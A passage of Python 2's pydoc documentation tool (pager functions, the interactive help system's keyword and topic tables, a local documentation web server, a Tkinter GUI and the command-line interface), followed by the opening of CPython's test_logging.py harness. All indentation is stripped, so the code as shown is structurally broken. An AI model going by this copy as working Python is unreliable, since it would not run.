"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
name = getattr(thing, '__name__', None)
return thing, name if isinstance(name, str) else None
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
try:
module_doc = __import__(modname).__doc__
except ImportError:
module_doc = None
desc = split(module_doc or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <[email protected]></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import copy
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
